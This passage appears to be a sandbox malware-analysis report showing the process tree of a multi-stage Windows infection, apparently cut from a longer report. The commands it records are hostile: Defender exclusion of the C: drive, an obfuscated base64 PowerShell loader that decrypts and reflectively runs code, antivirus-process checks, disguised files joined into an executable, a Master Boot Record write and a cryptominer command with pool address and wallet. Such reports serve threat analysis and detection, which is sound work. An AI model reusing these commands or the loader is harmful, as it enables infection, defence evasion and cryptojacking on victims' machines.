  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1o70A8.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1o70A8.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4692
      - C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3700
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2240
      - C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3084
      - C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3504
      - C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5540
      - C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\10052940101\0cdf30e2d9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052940101\0cdf30e2d9.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052940101\0cdf30e2d9.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13028
        
        C:\Users\Admin\AppData\Local\Temp\10052950101\e84ac55482.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052950101\e84ac55482.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:13308
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052950101\e84ac55482.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:8644
      - C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4660
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5744
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:5124
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:3580
      - C:\Users\Admin\AppData\Local\Temp\10473320101\4c7bc1193a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473320101\4c7bc1193a.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4344
      - C:\Users\Admin\AppData\Local\Temp\10473330101\fa6aed6b7e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473330101\fa6aed6b7e.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:13184
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473330101\fa6aed6b7e.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13220
      - C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:10000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:10316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5448
      - C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:11084
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:11140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:11156
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:11220
      - C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:12536
      - C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe"
        6⤵
        Executes dropped EXE
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\onefile_6992_133883928995493747\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:9196
      - C:\Users\Admin\AppData\Local\Temp\10473390101\ebe0a88a02.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473390101\ebe0a88a02.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2140
      - C:\Users\Admin\AppData\Local\Temp\10473400101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473400101\LJl8AAr.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:9700
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9856
      - C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8068
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8168
      - C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:6512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:7136
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:9864
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:10000
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11836
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1588
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12452
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:7884
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10536
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10876
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:11004
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:11368
      - C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:10484
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2q8021.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2q8021.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5844
- - C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
    3⤵
    PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
    3⤵
    PID:1316
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:2564
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.118.49:49301 -u 47kJwZakUCHUPtYBwg8Hc5U3VEjqmPmKiYy8GPVQvdagRU2cTt9Fs4J34haCDRQNPdQ6oyhPQbmxP1dUp6aXVoogBCh9Dva.Worker_CPU -p x --cpu-max-threads-hint=50 -k
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:13208

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3368

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
